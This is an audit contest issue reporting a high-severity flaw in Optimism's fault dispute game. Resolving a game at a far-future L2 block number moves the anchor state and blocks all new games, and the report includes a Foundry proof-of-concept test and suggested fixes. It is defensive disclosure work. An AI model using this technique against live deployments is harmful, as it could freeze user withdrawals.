### ISSUE TITLE
0xdeadbeef - Maliciously claiming root for a large l2 block number will prevent additional creation of the game

### ISSUE THREAD

**Issue by sherlock-admin3** [sherlock-audit/2024-02-optimism-2024-judging#42]
0xdeadbeef

high

# Maliciously claiming root for a large l2 block number will prevent additional creation of the game

## Summary

By design dispute games can only be created for L2 block numbers that are subsequent to highest previously resolved claim respected L2 block number.

A malicious actor can claim for a far away L2 block number and resolve. This will prevent proving any additional withdrawals.

## Vulnerability Detail

When initializing a dispute game the `l2BlockNumber` to claim is checked that is not at or before `rootBlockNumber` 
```solidity
    function initialize() public payable virtual {
----------------------------------------------

        // Grab the latest anchor root.
        (Hash root, uint256 rootBlockNumber) = ANCHOR_STATE_REGISTRY.anchors(GAME_TYPE);

----------------------------------------------
        // Set the starting output root.
        startingOutputRoot = OutputRoot({ l2BlockNumber: rootBlockNumber, root: root });

        // Do not allow the game to be initialized if the root claim corresponds to a block at or before the
        // configured starting block number.
        if (l2BlockNumber() <= rootBlockNumber) revert UnexpectedRootClaim(rootClaim());
}
```

`rootBlockNumber` is initially set as the starting block which claims can be proved against and then it increases to the last resolved `L2BlockNumber`
```solidity
    function resolve() external returns (GameStatus status_) {
----------------------------------------------
        // Try to update the anchor state, this should not revert.
        ANCHOR_STATE_REGISTRY.tryUpdateAnchorState();
    }

----------------------------------------------
// ANCHOR_STATE_REGISTRY
    function tryUpdateAnchorState() external {
        // Grab the game and game data.
        IFaultDisputeGame game = IFaultDisputeGame(msg.sender);

----------------------------------------------

        // Actually update the anchor state.
        anchors[gameType] = OutputRoot({ l2BlockNumber: game.l2BlockNumber(), root: Hash.wrap(game.rootClaim().raw()) });
    }
``` 
The anchor state is updated before allowing the Guardian to intervene (finalizing withdrawal)

Since we assume `DEFENDER` can win in invalid claims, the malicious actor can create a game with a very large l2 block number and resolve it as `DEFENDER_WINS`.

While the Guardian will identify that the claim is invalid and blacklist the game, the Guardian does not have a way to revert the anchor state and therefore no claims can be proved anymore. The Guardian will need to change the respected game type which by itself has implications to user withdrawals. In any case - the attacker can perform the same attack again. 

The "Recommendation" section for mitigation options.

### POC 

Add the following test to `FaultDisputeGame.t.sol`

```solidity
    function test_createFutureGame() public {
        // create game at L2block 100
        gameProxy =
            FaultDisputeGame(payable(address(disputeGameFactory.create(GAME_TYPE, ROOT_CLAIM, abi.encode(100)))));

        vm.warp(block.timestamp + 3 days + 12 hours + 1 seconds);

        // Resolve claim (scope assumes DEFENDER can win even if invalid)
        gameProxy.resolveClaim(0);
        assertEq(uint8(gameProxy.resolve()), uint8(GameStatus.DEFENDER_WINS));

        // Reverts when creating a game at lower L2Block
        vm.expectRevert(abi.encodeWithSelector(UnexpectedRootClaim.selector, ROOT_CLAIM));
        gameProxy =
            FaultDisputeGame(payable(address(disputeGameFactory.create(GAME_TYPE, ROOT_CLAIM, abi.encode(1)))));
    }
```
## Impact

Dispute games cannot be created. 

## Code Snippet

https://github.com/sherlock-audit/2024-02-optimism-2024/blob/main/optimism/packages/contracts-bedrock/src/dispute/FaultDisputeGame.sol#L539C13-L539C26

## Tool used

Manual Review

## Recommendation

Consider the following:
1. Allow claiming roots for older l2 block numbers (breaks design)
2. Update the anchor state only after finalizing the withdrawal (guardian blacklist will prevent the withdrawal from finalizing)
3. Allow Guardian to revert anchor state when blacklisting games.

Duplicate of #90
